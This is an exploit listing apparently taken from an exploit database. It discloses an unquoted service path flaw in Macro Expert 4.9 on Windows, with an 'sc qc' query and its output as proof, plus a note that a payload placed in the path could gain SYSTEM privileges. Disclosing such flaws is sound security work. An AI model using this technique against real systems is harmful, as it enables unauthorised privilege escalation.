Share
## https://sploitus.com/exploit?id=PACKETSTORM:172740
# Exploit Title: Macro Expert 4.9 - Unquoted Service Path  
# Date: 04/06/2023  
# Exploit Author: Murat DEMIRCI  
# Vendor Homepage: http://www.macro-expert.com/  
# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe  
# Version: 4.9  
# Tested on: Windows 10  
  
# Proof of Concept :  
  
C:\Users\Murat>sc qc "Macro Expert"  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: Macro Expert  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Macro Expert  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
# If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts.